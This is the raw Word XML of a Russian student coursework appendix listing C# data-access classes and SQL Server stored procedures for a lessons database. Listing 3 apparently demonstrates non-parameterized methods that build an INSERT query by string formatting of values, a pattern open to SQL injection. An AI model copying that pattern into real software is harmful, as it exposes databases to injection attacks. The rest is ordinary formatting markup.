      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRDefault="003F3D0F" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc420854444"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00EB5DBA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="006C445E"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Абстрактный</w:t>
      </w:r>
      <w:r w:rsidRPr="006C445E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>базовый</w:t>
      </w:r>
      <w:r w:rsidRPr="006C445E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>класс</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="00EB5DBA" w:rsidRPr="006C445E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB5DBA"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abstract class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abstract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List&lt;Lesson&gt;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List&lt;Lesson&gt;();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byte[] data = (byte[]) reader["Data"];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LessonsInfoData.GetLesson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(data));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id =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)reader["id"];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title = reader["Title"].</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 reader["</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)reader["</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 xml:space="preserve">(new </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string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switch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"Title";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InstanceNotFoundException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w:t>
      </w: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EB5DBA" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc420854445"/>
      <w:bookmarkStart w:id="28" w:name="_Toc420429543"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="003F3D0F" w:rsidRPr="003B32C2"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Класс - наследник с параметризованными методами</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>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override sealed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SqlConnectionStringBuilder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> builder)</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builder.ConnectionString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void Dispose()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Values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(parameters[0].Key)));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0;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 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EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc420429544"/>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="003F3D0F" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc420854446"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="003F3D0F" w:rsidRPr="003B32C2" w:rsidRDefault="00E737A5" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Не параметризованными методы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="003F3D0F" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ласс</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="003F3D0F" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-наследник</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F3D0F"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SimplyLessonsDal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003F3D0F" w:rsidRPr="003B32C2" w:rsidRDefault="003F3D0F" w:rsidP="003F3D0F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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SimplyLessonsDal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Values ('{0}',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'{1}', '{2}', @Data, '{3}')",</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w:t>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FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc420429545"/>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="00543C05" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc420854447"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00EB5DBA" w:rsidRPr="009F0170">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00543C05" w:rsidRPr="009F0170" w:rsidRDefault="00543C05" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Методы</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реализованные</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через</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хранимые</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процедуры</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класса</w:t>
      </w:r>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>наследника</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="33" w:name="_Toc420429546"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StoreProcedureLessonsDal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00020A8D" w:rsidRPr="009F0170" w:rsidRDefault="00020A8D" w:rsidP="003F3D0F">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StoreProcedureLessonsDal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rPr>
        <w:t>_sqlConnection.Close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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rPr>
        <w:t xml:space="preserve">        }</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FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc420429547"/>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc420854448"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00431DC3" w:rsidRPr="003B32C2" w:rsidRDefault="00431DC3" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание хранимых процедур на </w:t>
      </w:r>
      <w:r w:rsidR="00EB5DBA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sql-сервере</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>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1) Процедура удаления урока.</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delete from Lessons where Lessons.id=@id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00431DC3" w:rsidRPr="003B32C2" w:rsidRDefault="00431DC3" w:rsidP="00543C05">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>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2) Процедура получения урока по ID</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r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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Lessons.Data</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3) Процедура получения урока без бинарной информации</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GetLessonWithoutDataById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00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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4) Процедура вставки урока в хранилище базы данных</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w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>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@Size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@Data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>varbinary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(max)</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INSERT INTO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].[Lessons]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[Size],</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[Data]</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VALUES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Title,@Autor,@DateCreate,@Size,@Data</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sectPr w:rsidR="00431DC3" w:rsidRPr="003B32C2" w:rsidSect="00F84B90">
      <w:headerReference w:type="even" r:id="rId24"/>
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="even" r:id="rId26"/>
      <w:footerReference w:type="default" r:id="rId27"/>
      <w:headerReference w:type="first" r:id="rId28"/>
      <w:footerReference w:type="first" r:id="rId29"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701"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F3A" w:rsidRDefault="00A30F3A" w:rsidP="004936B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A30F3A" w:rsidRDefault="00A30F3A" w:rsidP="004936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53" w:rsidRDefault="00830953">
    <w:pPr>
      <w:pStyle w:val="af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53" w:rsidRDefault="00830953">
    <w:pPr>
      <w:pStyle w:val="af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53" w:rsidRDefault="00830953">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F3A" w:rsidRDefault="00A30F3A" w:rsidP="004936B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A30F3A" w:rsidRDefault="00A30F3A" w:rsidP="004936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53" w:rsidRDefault="00830953">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53" w:rsidRDefault="00830953">
    <w:pPr>
      <w:pStyle w:val="af"/>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53" w:rsidRDefault="00830953">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D97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="377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1E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="271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25050"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82160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251534"/>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4F3824"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DD26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92D056B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CFE94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F6112CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9884A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A471E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFA684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A8C7A74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BB202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F92DAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3949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595B10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7AB84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3A2873"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21285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5A652E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66204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DF13E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CA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773187"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67ACC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6C2BA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76D0A2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11E505D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B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121B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B352B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26E4326"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A85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DF3509"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABFC7E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8797C45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88E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2A4BD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2A69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FD613C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2D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C56913"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CFE94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1020020"/>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3942A10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83D8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4C24DD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA363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5282A3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E1687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6C51D87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1152D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FE5A7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97BC7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CA32A3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF761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0310280"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F5A5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1153FB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B06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3D65382"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D26E50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5E13A6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6194F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CBC4191"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DB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7966D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="431C1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FD21E29"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="861C4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2EA3BA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C101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5258DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD808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BEB33CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4C81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17"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4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footnotePr>
    <w:footnote w:id="-1"/>
    <w:footnote w:id="0"/>
  </w:footnotePr>
  <w:endnotePr>
    <w:endnote w:id="-1"/>
    <w:endnote w:id="0"/>
  </w:endnotePr>
  <w:compat/>
  <w:rsids>
    <w:rsidRoot w:val="00E12733"/>
    <w:rsid w:val="00004326"/>
    <w:rsid w:val="00020866"/>
    <w:rsid w:val="00020A8D"/>
    <w:rsid w:val="00034EEB"/>
    <w:rsid w:val="00045266"/>
    <w:rsid w:val="00053534"/>
    <w:rsid w:val="000606E8"/>
    <w:rsid w:val="0008117F"/>
    <w:rsid w:val="000A78D7"/>
    <w:rsid w:val="000B289E"/>
    <w:rsid w:val="000C2980"/>
    <w:rsid w:val="000C551A"/>
    <w:rsid w:val="000E7610"/>
    <w:rsid w:val="000F43FF"/>
    <w:rsid w:val="00116404"/>
    <w:rsid w:val="001202D9"/>
    <w:rsid w:val="001203E1"/>
    <w:rsid w:val="00135789"/>
    <w:rsid w:val="00165AA1"/>
    <w:rsid w:val="001708CA"/>
    <w:rsid w:val="00171CDD"/>
    <w:rsid w:val="0017464E"/>
    <w:rsid w:val="00176FF7"/>
    <w:rsid w:val="00187B14"/>
    <w:rsid w:val="001931C4"/>
    <w:rsid w:val="00195233"/>
    <w:rsid w:val="001B1F8C"/>
    <w:rsid w:val="001F5ACA"/>
